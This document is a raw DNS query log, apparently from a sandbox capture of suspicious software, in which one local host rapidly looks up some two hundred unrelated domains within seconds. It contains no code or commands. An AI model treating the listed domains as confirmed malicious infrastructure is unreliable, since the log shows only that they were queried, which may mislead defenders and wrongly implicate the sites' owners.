                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.924943924 CEST192.168.2.31.1.1.10x6bd5Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.934407949 CEST192.168.2.31.1.1.10x4293Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:55.935326099 CEST192.168.2.31.1.1.10x206fStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.062515020 CEST192.168.2.31.1.1.10x2e84Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.130045891 CEST192.168.2.31.1.1.10xcab9Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.173435926 CEST192.168.2.31.1.1.10xe72fStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.241241932 CEST192.168.2.31.1.1.10x1306Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.345422029 CEST192.168.2.31.1.1.10x407fStandard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.552175999 CEST192.168.2.31.1.1.10xee1bStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.563147068 CEST192.168.2.31.1.1.10xaaeaStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.612432003 CEST192.168.2.31.1.1.10xf093Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.641877890 CEST192.168.2.31.1.1.10xf082Standard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.646781921 CEST192.168.2.31.1.1.10x8806Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.664061069 CEST192.168.2.31.1.1.10xeaabStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.696629047 CEST192.168.2.31.1.1.10x9cd8Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.731508970 CEST192.168.2.31.1.1.10xc498Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.923261881 CEST192.168.2.31.1.1.10x1a8aStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.977855921 CEST192.168.2.31.1.1.10x887eStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.979818106 CEST192.168.2.31.1.1.10x4bf9Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:56.982352018 CEST192.168.2.31.1.1.10x5f62Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.037281990 CEST192.168.2.31.1.1.10x929cStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.129281044 CEST192.168.2.31.1.1.10xf966Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.156183004 CEST192.168.2.31.1.1.10x5300Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.171842098 CEST192.168.2.31.1.1.10xc7e1Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.331152916 CEST192.168.2.31.1.1.10x85e1Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.378808022 CEST192.168.2.31.1.1.10x8260Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.394375086 CEST192.168.2.31.1.1.10xde84Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.472333908 CEST192.168.2.31.1.1.10x1b79Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.538552046 CEST192.168.2.31.1.1.10xa0f4Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.547566891 CEST192.168.2.31.1.1.10xfe95Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.585489035 CEST192.168.2.31.1.1.10x1aa1Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.585489035 CEST192.168.2.31.1.1.10xa6a8Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.816366911 CEST192.168.2.31.1.1.10xeb3bStandard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.858525038 CEST192.168.2.31.1.1.10xb01aStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.860622883 CEST192.168.2.31.1.1.10xba6dStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.861404896 CEST192.168.2.31.1.1.10x1886Standard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.898030996 CEST192.168.2.31.1.1.10x5b54Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.950256109 CEST192.168.2.31.1.1.10x4293Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:57.989308119 CEST192.168.2.31.1.1.10xf90fStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.017319918 CEST192.168.2.31.1.1.10x63fdStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.137868881 CEST192.168.2.31.1.1.10xf966Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.221563101 CEST192.168.2.31.1.1.10xcfe9Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.251316071 CEST192.168.2.31.1.1.10xad98Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.279208899 CEST192.168.2.31.1.1.10x7e43Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.346405029 CEST192.168.2.31.1.1.10x2a49Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.609131098 CEST192.168.2.31.1.1.10xa67Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.651542902 CEST192.168.2.31.1.1.10xac2eStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.842649937 CEST192.168.2.31.1.1.10x8677Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.857228041 CEST192.168.2.31.1.1.10xe2dStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.872163057 CEST192.168.2.31.1.1.10xb01aStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.907468081 CEST192.168.2.31.1.1.10x8d3eStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.929467916 CEST192.168.2.31.1.1.10x8ad9Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:58.953697920 CEST192.168.2.31.1.1.10xa264Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.079476118 CEST192.168.2.31.1.1.10x3bcfStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.094227076 CEST192.168.2.31.1.1.10x9f91Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.137974024 CEST192.168.2.31.1.1.10xf966Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.151918888 CEST192.168.2.31.1.1.10x1b8eStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.219248056 CEST192.168.2.31.1.1.10x774aStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.237555027 CEST192.168.2.31.1.1.10x92cStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.251271963 CEST192.168.2.31.1.1.10x75eeStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.263133049 CEST192.168.2.31.1.1.10xe064Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.280527115 CEST192.168.2.31.1.1.10x18b2Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.312159061 CEST192.168.2.31.1.1.10xc6d3Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.325494051 CEST192.168.2.31.1.1.10x7849Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.629340887 CEST192.168.2.31.1.1.10xbd19Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.630064964 CEST192.168.2.31.1.1.10x887bStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.670907021 CEST192.168.2.31.1.1.10x4ea0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:59.755275011 CEST192.168.2.31.1.1.10x235cStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.006973982 CEST192.168.2.31.1.1.10x8d3eStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.377820015 CEST192.168.2.31.1.1.10xb076Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.383521080 CEST192.168.2.31.1.1.10x183eStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.563798904 CEST192.168.2.31.1.1.10x167fStandard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.565622091 CEST192.168.2.31.1.1.10x6880Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.604152918 CEST192.168.2.31.1.1.10x6db3Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.621583939 CEST192.168.2.31.1.1.10x49c8Standard query (0)www.clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.724147081 CEST192.168.2.31.1.1.10xed3fStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:00.935592890 CEST192.168.2.31.1.1.10x1b8Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.016985893 CEST192.168.2.31.1.1.10x17f4Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.062357903 CEST192.168.2.31.1.1.10x5651Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.285806894 CEST192.168.2.31.1.1.10xb2fbStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.303559065 CEST192.168.2.31.1.1.10x1fb9Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.490993023 CEST192.168.2.31.1.1.10x3ebeStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.508132935 CEST192.168.2.31.1.1.10x6386Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.575167894 CEST192.168.2.31.1.1.10xae48Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.575431108 CEST192.168.2.31.1.1.10x869fStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.696690083 CEST192.168.2.31.1.1.10x45daStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:01.811446905 CEST192.168.2.31.1.1.10x775fStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.013758898 CEST192.168.2.31.1.1.10xac9eStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.112029076 CEST192.168.2.3192.36.148.170xa7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.215075016 CEST192.168.2.31.1.1.10x6795Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.264204979 CEST192.168.2.31.1.1.10xdd19Standard query (0)gbp-jp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.288748980 CEST192.168.2.31.1.1.10xf9d7Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.337208986 CEST192.168.2.3198.41.0.40x11Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.344250917 CEST192.168.2.3192.203.230.100xf1Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.414836884 CEST192.168.2.31.1.1.10x7d5bStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.420792103 CEST192.168.2.31.1.1.10xb656Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.485390902 CEST192.168.2.31.1.1.10xa4ecStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.500005007 CEST192.168.2.3192.58.128.300x47Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.507246017 CEST192.168.2.3198.41.0.40x63Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.531770945 CEST192.168.2.31.1.1.10x1fc7Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.548749924 CEST192.168.2.31.1.1.10xb60bStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.608603001 CEST192.168.2.31.1.1.10x481bStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.614329100 CEST192.168.2.3128.8.10.900xb7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.719481945 CEST192.168.2.31.1.1.10x465fStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.831223965 CEST192.168.2.3192.5.5.2410xecStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:02.873723030 CEST192.168.2.31.1.1.10xb27fStandard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.541425943 CEST192.168.2.31.1.1.10x1fc7Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.731421947 CEST192.168.2.31.1.1.10x9a67Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.758514881 CEST192.168.2.31.1.1.10x79e3Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:03.989259005 CEST192.168.2.31.1.1.10x8789Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.159171104 CEST192.168.2.31.1.1.10x944cStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.213212967 CEST192.168.2.31.1.1.10xc5b2Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.259423018 CEST192.168.2.31.1.1.10x2328Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.379884958 CEST192.168.2.31.1.1.10x4983Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.453846931 CEST192.168.2.31.1.1.10x59c3Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.453846931 CEST192.168.2.31.1.1.10x9ba3Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.528646946 CEST192.168.2.31.1.1.10x74a5Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.602968931 CEST192.168.2.31.1.1.10xd110Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.659145117 CEST192.168.2.31.1.1.10xc226Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.766450882 CEST192.168.2.31.1.1.10x39bbStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:04.861258984 CEST192.168.2.31.1.1.10x5475Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.247404099 CEST192.168.2.31.1.1.10x2b6aStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.301428080 CEST192.168.2.31.1.1.10x5c5cStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.569209099 CEST192.168.2.31.1.1.10x874Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.825946093 CEST192.168.2.31.1.1.10x6b14Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:05.998528957 CEST192.168.2.31.1.1.10x26feStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.081263065 CEST192.168.2.31.1.1.10x1fcaStandard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.314486027 CEST192.168.2.31.1.1.10x7b64Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.378074884 CEST192.168.2.31.1.1.10xb5bbStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.392663002 CEST192.168.2.31.1.1.10xee22Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.457268953 CEST192.168.2.31.1.1.10x3500Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.673549891 CEST192.168.2.31.1.1.10x714fStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.708370924 CEST192.168.2.31.1.1.10xc15bStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.768760920 CEST192.168.2.31.1.1.10xc6e0Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.797899008 CEST192.168.2.31.1.1.10x8260Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:06.812659979 CEST192.168.2.31.1.1.10xca4cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.251234055 CEST192.168.2.31.1.1.10xb59aStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.298782110 CEST192.168.2.31.1.1.10x12e3Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.330152988 CEST192.168.2.31.1.1.10x806dStandard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.566325903 CEST192.168.2.31.1.1.10x4e5aStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.566869020 CEST192.168.2.31.1.1.10x46b4Standard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.687077045 CEST192.168.2.31.1.1.10xc4b3Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.715881109 CEST192.168.2.31.1.1.10xc15bStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.778547049 CEST192.168.2.31.1.1.10xc6e0Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.825283051 CEST192.168.2.31.1.1.10xca4cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.887995958 CEST192.168.2.3128.8.10.900xb7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:07.984726906 CEST192.168.2.31.1.1.10xf3c6Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.188545942 CEST192.168.2.31.1.1.10x8df0Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.236959934 CEST192.168.2.31.1.1.10x2919Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.361871958 CEST192.168.2.31.1.1.10x3951Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.439701080 CEST192.168.2.31.1.1.10xa009Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.497594118 CEST192.168.2.31.1.1.10xed0fStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.779014111 CEST192.168.2.31.1.1.10xc6e0Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.779903889 CEST192.168.2.31.1.1.10x5a00Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.825251102 CEST192.168.2.31.1.1.10xca4cStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:08.844799042 CEST192.168.2.31.1.1.10x240dStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.231786013 CEST192.168.2.31.1.1.10x2919Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.294204950 CEST192.168.2.31.1.1.10xbcc7Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.472469091 CEST192.168.2.31.1.1.10x5e6eStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.719245911 CEST192.168.2.31.1.1.10x34c5Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.751597881 CEST192.168.2.31.1.1.10x7603Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:09.919286013 CEST192.168.2.31.1.1.10x2639Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.031843901 CEST192.168.2.31.1.1.10xdc14Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.111910105 CEST192.168.2.31.1.1.10xb7bdStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.284089088 CEST192.168.2.31.1.1.10x845cStandard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.301249027 CEST192.168.2.31.1.1.10x8a4fStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:10.796416998 CEST192.168.2.31.1.1.10xc6e0Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.344266891 CEST192.168.2.31.1.1.10x3c17Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:11.835246086 CEST192.168.2.31.1.1.10x4639Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:12.191157103 CEST192.168.2.31.1.1.10x5111Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:12.843074083 CEST192.168.2.31.1.1.10xdc28Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:12.907414913 CEST192.168.2.31.1.1.10xd4bcStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.003057957 CEST192.168.2.31.1.1.10x6d18Standard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.153723955 CEST192.168.2.3128.8.10.900xb7Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.176656008 CEST192.168.2.31.1.1.10x7724Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:13.528846025 CEST192.168.2.31.1.1.10xe97dStandard query (0)peminet.netA (IP address)IN (0x0001)false
